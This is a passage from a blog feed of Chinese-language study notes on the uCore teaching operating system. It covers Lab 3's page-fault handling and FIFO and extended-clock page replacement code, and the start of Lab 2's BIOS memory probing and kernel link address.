class="line">    <span class="type">uint32_t</span> vm_flags;       <span class="comment">// 相关标志位</span></span><br><span class="line">    <span class="type">list_entry_t</span> list_link;  <span class="comment">// 用于连接各个虚拟页的双向指针</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 数据结构Page相关成员的用途已在uCore-2中介绍过，这里只提它新增的两个成员pra_*</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">Page</span> &#123;</span><br><span class="line">    <span class="type">int</span> ref;</span><br><span class="line">    <span class="type">uint32_t</span> flags;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> property;</span><br><span class="line">    <span class="type">list_entry_t</span> page_link;</span><br><span class="line">    <span class="type">list_entry_t</span> pra_page_link;     <span class="comment">// 用于连接上一个和下一个*可交换已分配*的物理页</span></span><br><span class="line">    <span class="type">uintptr_t</span> pra_vaddr;            <span class="comment">// 用于保存该物理页所对应的虚拟地址。</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><ul><li>当分配某个虚拟页<code>vma_struct</code>时，程序会在<code>insert_vma_struct</code>函数中设置其<code>vm_mm</code>成员为某个<code>mm_struct</code>，这样便于后续的管理。</li><li>在函数<code>pgdir_alloc_page</code>中，程序会设置<code>Page</code>的<code>pra_vaddr</code>成员，将其设置为当前物理页所对应的虚拟地址，之后便可通过<code>Page-&gt;pra_vaddr-&gt;pte</code>一条链，直接找到当前<strong>物理页</strong>地址所对应的PTE条目。同时，也可通过<code>pra_vaddr</code>来确定对应外存的相对偏移<code>page-&gt;pra_vaddr/PGSIZE+1</code>。</li><li><code>Page::page_link</code>用于将空闲物理页连接至双向链表中，而<code>page::pra_page_link</code>用于将<strong>可交换的已分配</strong>物理页连接至另一个双向链表中，注意两者的用途是不同的。</li></ul></li></ul><h2 id="练习解答">练习解答</h2><h3 id="1-练习0">1. 练习0</h3><blockquote><p><strong>填写已有实验</strong></p></blockquote><ul><li>抄就对了。</li></ul><h3 id="2-练习1">2. 练习1</h3><blockquote><p><strong>给未被映射的地址映射上物理页</strong></p><p>完成do_pgfault（mm/vmm.c）函数，给未被映射的地址映射上物理页。设置访问权限 的时候需要参考页面所在 VMA 的权限，同时需要注意映射物理页时需要操作内存控制 结构所指定的页表，而不是内核的页表。</p></blockquote><p>实验代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_pgfault</span><span class="params">(<span class="keyword">struct</span> mm_struct *mm, <span class="type">uint32_t</span> error_code, <span class="type">uintptr_t</span> addr)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_INVAL;</span><br><span class="line">    <span class="comment">// 获取触发pgfault的虚拟地址所在虚拟页</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">vma_struct</span> *vma = <span class="built_in">find_vma</span>(mm, addr);</span><br><span class="line"></span><br><span class="line">    pgfault_num++;</span><br><span class="line">    <span class="comment">// 如果当前访问的虚拟地址不在已经分配的虚拟页中</span></span><br><span class="line">    <span class="keyword">if</span> (vma == <span class="literal">NULL</span> || vma-&gt;vm_start &gt; addr) &#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;not valid addr %x, and  can not find it in vma\n&quot;</span>, addr);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 检测错误代码。这里的检测不涉及特权判断。</span></span><br><span class="line">    <span class="keyword">switch</span> (error_code &amp; <span class="number">3</span>) &#123;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="comment">// 写，同时存在物理页，则写时复制</span></span><br><span class="line">        <span class="comment">// 需要注意的是，default会执行case2的代码，也就是判断是否有写权限。</span></span><br><span class="line">    <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        <span class="comment">// 读，同时不存在物理页</span></span><br><span class="line">        <span class="comment">// 同时如果当前操作是写入，但所在虚拟页不允许写入</span></span><br><span class="line">        <span class="keyword">if</span> (!(vma-&gt;vm_flags &amp; VM_WRITE)) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;do_pgfault failed: error code flag = write AND not present, but the addr&#x27;s vma cannot write\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">1</span>: <span class="comment">/* error code flag : (W/R=0, P=1): read, present */</span></span><br><span class="line">        <span class="comment">// 读，同时存在物理页。那就不可能会调用page fault，肯定哪里有问题，直接failed</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;do_pgfault failed: error code flag = read AND present\n&quot;</span>);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0</span>: <span class="comment">/* error code flag : (W/R=0, P=0): read, not present */</span></span><br><span class="line">        <span class="comment">// 写，同时不存在物理页面</span></span><br><span class="line">        <span class="comment">// 如果当前操作是读取，但所在虚拟页不允许读取或执行</span></span><br><span class="line">        <span class="keyword">if</span> (!(vma-&gt;vm_flags &amp; (VM_READ | VM_EXEC))) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;do_pgfault failed: error code flag = read AND not present, but the addr&#x27;s vma cannot read or exec\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 设置页表条目所对应的权限</span></span><br><span class="line">    <span class="type">uint32_t</span> perm = PTE_U;</span><br><span class="line">    <span class="keyword">if</span> (vma-&gt;vm_flags &amp; VM_WRITE) &#123;</span><br><span class="line">        perm |= PTE_W;</span><br><span class="line">    &#125;</span><br><span class="line">    addr = <span class="built_in">ROUNDDOWN</span>(addr, PGSIZE);</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line">    <span class="type">pte_t</span> *ptep=<span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* LAB3 EXERCISE 1: YOUR CODE */</span></span><br><span class="line">    <span class="comment">// 查找当前虚拟地址所对应的页表项</span></span><br><span class="line">    <span class="keyword">if</span> ((ptep = <span class="built_in">get_pte</span>(mm-&gt;pgdir, addr, <span class="number">1</span>)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;get_pte in do_pgfault failed\n&quot;</span>);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果这个页表项所对应的物理页不存在，则</span></span><br><span class="line">    <span class="keyword">if</span> (*ptep == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 分配一块物理页，并设置页表项</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, addr, perm) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;pgdir_alloc_page in do_pgfault failed\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">/* LAB3 EXERCISE 2: YOUR CODE */</span></span><br><span class="line">        <span class="comment">// 如果这个页表项所对应的物理页存在，但不在内存中</span></span><br><span class="line">        <span class="comment">// 如果swap已经初始化完成</span></span><br><span class="line">        <span class="keyword">if</span>(swap_init_ok) &#123;</span><br><span class="line">            <span class="keyword">struct</span> Page *page=<span class="literal">NULL</span>;</span><br><span class="line">            <span class="comment">// 将目标数据加载到某块新的物理页中。</span></span><br><span class="line">            <span class="comment">// 该物理页可能是尚未分配的物理页，也可能是从别的已分配物理页中取的</span></span><br><span class="line">            <span class="keyword">if</span> ((ret = <span class="built_in">swap_in</span>(mm, addr, &amp;page)) != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;swap_in in do_pgfault failed\n&quot;</span>);</span><br><span class="line">                <span class="keyword">goto</span> failed;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 将该物理页与对应的虚拟地址关联，同时设置页表。</span></span><br><span class="line">            <span class="built_in">page_insert</span>(mm-&gt;pgdir, page, addr, perm);</span><br><span class="line">            <span class="comment">// 当前缺失的页已经加载回内存中，所以设置当前页为可swap。</span></span><br><span class="line">            <span class="built_in">swap_map_swappable</span>(mm, addr, page, <span class="number">1</span>);</span><br><span class="line">            page-&gt;pra_vaddr = addr;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;no swap_init_ok but ptep is %x, failed\n&quot;</span>,*ptep);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   ret = <span class="number">0</span>;</span><br><span class="line">failed:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li>请描述页目录项（Page Directory Entry）和页表项（Page Table Entry）中组成部分对ucore实现页替换算法的潜在用处。<ul><li>PTE结构与其标志位用途，请移步<a href="/2020/08/uCore-2#d-%E8%99%9A%E6%8B%9F%E9%A1%B5%E8%A1%A8%E7%BB%93%E6%9E%84">uCore Lab2 - 虚拟页表结构</a></li></ul></li><li>如果ucore的缺页服务例程在执行过程中访问内存，出现了页访问异常，请问硬件要做哪些事情？<ul><li>将发生错误的线性地址（虚拟地址）保存至CR2寄存器中。</li><li>压入<code>EFLAGS</code>，<code>CS</code>, <code>EIP</code>，错误码和中断号至当前内核栈中。</li><li>保存上下文。</li><li>执行新的缺页中断程序。</li><li>恢复上下文。</li><li>继续执行上一级的缺页服务例程。</li></ul></li></ul><h3 id="3-练习2">3. 练习2</h3><blockquote><p><strong>补充完成基于FIFO的页面替换算法</strong></p><p>完成vmm.c中的do_pgfault函数，并且在实现FIFO算法的swap_fifo.c中完成map_swappable和swap_out_victim函数。</p></blockquote><ul><li><p><code>FIFO</code>中，当新加入一个物理页时，我们只需将该物理页加入至链表首部即可。当需要换出某个物理页时，选择链表末尾的物理页即可。</p></li><li><p>相关实现如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">int</span></span><br><span class="line">_fifo_map_swappable(<span class="keyword">struct</span> mm_struct *mm, <span class="type">uintptr_t</span> addr, <span class="keyword">struct</span> Page   *page, <span class="type">int</span> swap_in)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">list_entry_t</span> *head=(<span class="type">list_entry_t</span>*) mm-&gt;sm_priv;</span><br><span class="line">    <span class="type">list_entry_t</span> *entry=&amp;(page-&gt;pra_page_link);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(entry != <span class="literal">NULL</span> &amp;&amp; head != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">//record the page access situlation</span></span><br><span class="line">    <span class="comment">/*LAB3 EXERCISE 2: YOUR CODE*/</span></span><br><span class="line">    <span class="comment">//(1)link the most recent arrival page at the back of the pra_list_head qeueue.</span></span><br><span class="line">    <span class="built_in">list_add</span>(head, entry);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">int</span></span><br><span class="line">_fifo_swap_out_victim(<span class="keyword">struct</span> mm_struct *mm, <span class="keyword">struct</span> Page ** ptr_page, <span class="type">int</span> in_tick)</span><br><span class="line">&#123;</span><br><span class="line">     <span class="type">list_entry_t</span> *head=(<span class="type">list_entry_t</span>*) mm-&gt;sm_priv;</span><br><span class="line">         <span class="built_in">assert</span>(head != <span class="literal">NULL</span>);</span><br><span class="line">     <span class="built_in">assert</span>(in_tick==<span class="number">0</span>);</span><br><span class="line">     <span class="comment">/* Select the victim */</span></span><br><span class="line">     <span class="comment">/*LAB3 EXERCISE 2: YOUR CODE*/</span></span><br><span class="line">     <span class="comment">//(1)  unlink the  earliest arrival page in front of pra_list_head qeueue</span></span><br><span class="line">     <span class="comment">//(2)  assign the value of *ptr_page to the addr of this page</span></span><br><span class="line">     <span class="type">list_entry_t</span> *le = head-&gt;prev;</span><br><span class="line">     <span class="built_in">assert</span>(head!=le);</span><br><span class="line">     <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span class="built_in">le2page</span>(le, pra_page_link);</span><br><span class="line">     <span class="built_in">list_del</span>(le);</span><br><span class="line">     <span class="built_in">assert</span>(p !=<span class="literal">NULL</span>);</span><br><span class="line">     *ptr_page = p;</span><br><span class="line"></span><br><span class="line">     <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>如果要在ucore上实现&quot;extended clock页替换算法&quot;请给你的设计方案，现有的swap_manager框架是否足以支持在ucore中实现此算法？如果是，请给你的设计方案。如果不是，请给出你的新的扩展和基此扩展的设计方案。并需要回答如下问题</p><ul><li>现有的swap_manager框架可以支持在ucore中实现此算法，具体见<strong>扩展练习1</strong>。</li><li>需要被换出的页的特征是什么？<ul><li><code>PTE_P</code>(Present)和<code>PTE_D</code>(Dirty)位均为0。</li></ul></li><li>在ucore中如何判断具有这样特征的页？<ul><li>获取线性地址所对应的页表项，之后使用位运算判断<code>PTE_P</code>和<code>PTE_D</code>。</li></ul></li><li>何时进行换入和换出操作？<ul><li>缺页时换入。</li><li>物理页帧满时换出，不过需要注意dirtybit的处理。可以在修改dirty的时候写入外存，或者可以在最终要删除该物理页时再写入外存。后者有利于多个写操作的合并，降低缺页代价，但此时的页替换算法却退化成普通的clock算法，而不是extended clock算法了。</li></ul></li></ul></li></ul><h3 id="4-扩展练习">4. 扩展练习</h3><h4 id="Challenge-1">Challenge 1</h4><blockquote><p><strong>实现识别dirty bit的 extended clock页替换算法</strong></p></blockquote><ul><li><p>在<code>FIFO</code>的基础上，实现<code>swap_out_victim</code>函数即可。</p></li><li><p>该函数中查找一块可用于换出的物理页，最多只需要遍历三次：</p><ul><li>第一次查找 !PTE_A &amp; !PTE_D，同时重置当前页的PTE_A，为第二次遍历的条件打基础</li><li>第二次查找 !PTE_A &amp; !PTE_D， 同时重置当前页的PTE_D，为第三次遍历的条件打基础</li><li>第三次查找，肯定能找到</li></ul></li><li><p>这里需要注意对于<code>PTE_D</code>的操作，若第一次、第二次遍历都找不到符合要求的物理页，则必须对<code>PTE_D</code>下手，重置该标志位。还有一点需要注意，在每次修改PTE标志位后，都需要重置TLB缓存。</p></li><li><p><code>swap_out_victim</code>相关代码如下（偷了个小懒，每次遍历链表都是从头开始，同时其余函数沿用<code>FIFO</code>）：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">int</span></span><br><span class="line">_extend_clock_swap_out_victim(<span class="keyword">struct</span> mm_struct *mm, <span class="keyword">struct</span> Page ** ptr_page, <span class="type">int</span> in_tick)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">list_entry_t</span> *head=(<span class="type">list_entry_t</span>*) mm-&gt;sm_priv;</span><br><span class="line">        <span class="built_in">assert</span>(head != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(in_tick==<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 第一次查找 !PTE_A &amp; !PTE_D，同时重置当前页的PTE_A</span></span><br><span class="line">    <span class="comment">// 第二次查找 !PTE_A &amp; !PTE_D， 同时重置当前页的PTE_D</span></span><br><span class="line">    <span class="comment">// 第三次查找，肯定能找到</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">3</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">list_entry_t</span> *le = head-&gt;prev;</span><br><span class="line">        <span class="built_in">assert</span>(head!=le);</span><br><span class="line">        <span class="keyword">while</span>(le != head)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span class="built_in">le2page</span>(le, pra_page_link);</span><br><span class="line">            <span class="type">pte_t</span>* ptep = <span class="built_in">get_pte</span>(mm-&gt;pgdir, p-&gt;pra_vaddr, <span class="number">0</span>);</span><br><span class="line">            <span class="comment">// 如果满足未使用未修改这两个条件，则直接分配</span></span><br><span class="line">            <span class="keyword">if</span>(!(*ptep &amp; PTE_A) &amp;&amp; !(*ptep &amp; PTE_D))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">list_del</span>(le);</span><br><span class="line">                <span class="built_in">assert</span>(p !=<span class="literal">NULL</span>);</span><br><span class="line">                *ptr_page = p;</span><br><span class="line">                <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 如果在第一次查找中，访问到了一个已经使用过的PTE，则标记为未使用。</span></span><br><span class="line">            <span class="keyword">if</span>(i == <span class="number">0</span>)</span><br><span class="line">                *ptep &amp;= ~PTE_A;</span><br><span class="line">            <span class="comment">// 如果在第二次查找中，访问到了一个已修改过的PTE，则标记为未修改。</span></span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(i == <span class="number">1</span>)</span><br><span class="line">                *ptep &amp;= ~PTE_D;</span><br><span class="line"></span><br><span class="line">            le = le-&gt;prev;</span><br><span class="line">            <span class="comment">// 遍历了一回，肯定修改了标志位，所以要刷新TLB</span></span><br><span class="line">            <span class="built_in">tlb_invalidate</span>(mm-&gt;pgdir, le);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 按照前面的assert与if，不可能会执行到此处，所以return -1</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">swap_manager</span> swap_manager_fifo =</span><br><span class="line">&#123;</span><br><span class="line">     .name            = <span class="string">&quot;extend_clock swap manager&quot;</span>,</span><br><span class="line">     .init            = &amp;_fifo_init,</span><br><span class="line">     .init_mm         = &amp;_fifo_init_mm,</span><br><span class="line">     .tick_event      = &amp;_fifo_tick_event,</span><br><span class="line">     .map_swappable   = &amp;_fifo_map_swappable,</span><br><span class="line">     .set_unswappable = &amp;_fifo_set_unswappable,</span><br><span class="line">     .swap_out_victim = &amp;_extend_clock_swap_out_victim,</span><br><span class="line">     .check_swap      = &amp;_fifo_check_swap,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li></ul><h4 id="Challenge-2">Challenge 2</h4><blockquote><p><strong>实现不考虑实现开销和效率的LRU页替换算法</strong></p></blockquote><p>遇到了一个较为麻烦的问题：如何在正常访问内存时设置<code>swap_manager</code>中相关链表上物理页的LRU，留坑…</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 3时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及虚拟内存存储等&lt;/li&gt;
&lt;li&gt;内容较多，建议使用右侧导航栏。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab2</title>
    <link href="https://kiprey.github.io/2020/08/uCore-2/"/>
    <id>https://kiprey.github.io/2020/08/uCore-2/</id>
    <published>2020-08-09T14:25:53.000Z</published>
    <updated>2025-11-24T03:59:40.149Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成<code>uCore</code> Lab 2时写下的一些笔记</li><li>内容涉及段页式存储管理、页机制以及uCore页目录与页表结构等</li><li>内容较多，建议使用右侧导航栏。</li></ul><span id="more"></span><h2 id="1-知识点">1. 知识点</h2><h3 id="1-物理内存探测">1) 物理内存探测</h3><ul><li><p>操作系统需要知道了解整个计算机系统中的物理内存如何分布的，哪些被可用，哪些不可用。其基本方法是通过BIOS中断调用来帮助完成的。<code>bootasm.S</code>中新增了一段代码，使用BIOS中断检测物理内存总大小。</p></li><li><p>在讲解该部分代码前，先引入一个结构体</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">e820map</span> &#123;      <span class="comment">// 该数据结构保存于物理地址0x8000</span></span><br><span class="line">    <span class="type">int</span> nr_map;       <span class="comment">// map中的元素个数</span></span><br><span class="line">    <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">uint64_t</span> addr;    <span class="comment">// 某块内存的起始地址</span></span><br><span class="line">        <span class="type">uint64_t</span> size;    <span class="comment">// 某块内存的大小</span></span><br><span class="line">        <span class="type">uint32_t</span> type;    <span class="comment">// 某块内存的属性。1标识可被使用内存块；2表示保留的内存块，不可映射。</span></span><br><span class="line">    &#125; __attribute__((packed)) map[E820MAX];</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>以下是bootasm.S中新增的代码，详细信息均以注释的形式写入代码中。</p>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">probe_memory:</span></span><br><span class="line">    movl <span class="number">$0</span>, <span class="number">0x8000</span>   # 初始化，向内存地址<span class="number">0x8000</span>，即uCore结构e820map中的成员nr_map中写入<span class="number">0</span></span><br><span class="line">    xorl %ebx, %ebx   # 初始化%ebx为<span class="number">0</span>，这是<span class="keyword">int</span> <span class="number">0x15</span>的其中一个参数</span><br><span class="line">    movw <span class="number">$0</span>x8004, %di # 初始化%di寄存器，使其指向结构e820map中的成员数组map</span><br><span class="line"><span class="symbol">start_probe:</span></span><br><span class="line">    movl <span class="number">$0</span>xE820, %eax  # BIOS <span class="number">0x15</span>中断的子功能编号 %eax == <span class="number">0xE820</span></span><br><span class="line">    movl <span class="number">$20</span>, %ecx    # 存放地址范围描述符的内存大小，至少<span class="number">20</span></span><br><span class="line">    movl $SMAP, %edx  # 签名， %edx == 0x534D4150h(<span class="string">&quot;SMAP&quot;</span>字符串的ASCII码)</span><br><span class="line">    <span class="keyword">int</span> <span class="number">$0</span>x15     # 调用<span class="number">0x15</span>中断</span><br><span class="line">    <span class="keyword">jnc</span> cont      # 如果该中断执行失败，则CF标志位会置<span class="number">1</span>，此时要通知UCore出错</span><br><span class="line">    movw <span class="number">$12345</span>, <span class="number">0x8000</span> # 向结构e820map中的成员nr_map中写入特殊信息，报告当前错误</span><br><span class="line">    <span class="keyword">jmp</span> finish_probe    # 跳转至结束，不再探测内存</span><br><span class="line"><span class="symbol">cont:</span></span><br><span class="line">    addw <span class="number">$20</span>, %di   # 如果中断执行正常，则目标写入地址就向后移动一个位置</span><br><span class="line">    incl <span class="number">0x8000</span>     # e820::nr_map++</span><br><span class="line">    cmpl <span class="number">$0</span>, %ebx   # 执行中断后，返回的%ebx是原先的%ebx加一。如果%ebx为<span class="number">0</span>，则说明当前内存探测完成</span><br><span class="line">    <span class="keyword">jnz</span> start_probe</span><br><span class="line"><span class="symbol">finish_probe:</span></span><br></pre></td></tr></table></figure></li><li><p>这部分代码执行完成后，从BIOS中获得的内存分布信息以结构体<code>e820map</code>的形式写入至物理<code>0x8000</code>地址处。稍后ucore的page_init函数会访问该地址并处理所有的内存信息。</p></li></ul><h3 id="2-链接地址">2) 链接地址</h3><ul><li><p>审计<code>lab2/tools/kernel.ld</code>这个链接脚本，我们可以很容易的发现，链接器设置kernel的链接地址(link address)为<code>0xC0100000</code>，这是个虚拟地址。在uCore的bootloader中，bootloader使用如下语句来加载kernel：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">readseg</span>(ph-&gt;p_va &amp; <span class="number">0xFFFFFF</span>, ph-&gt;p_memsz, ph-&gt;p_offset);</span><br></pre></td></tr></table></figure><p><code>0xC0010000 &amp; 0xFFFFFF == 0x00100000</code>即kernel最终被装载入物理地址<code>0x10000</code>处，其相对偏移为<code>-0xc0000000</code>，与uCore中所设置的虚拟地址的偏移量相对应。</p></li><li><p>需要注意的是，在lab2的一些代码中会使用到如下两个变量，但这两个变量并没有被定义在任何C语言的源代码中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">extern</span> <span class="type">char</span> end[];</span><br><span class="line"><span class="keyword">extern</span> <span class="type">char</span> edata[];</span><br></pre></td></tr></table></figure><p>实际上，它们定义于<code>kernel.ld</code>这个链接脚本中</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 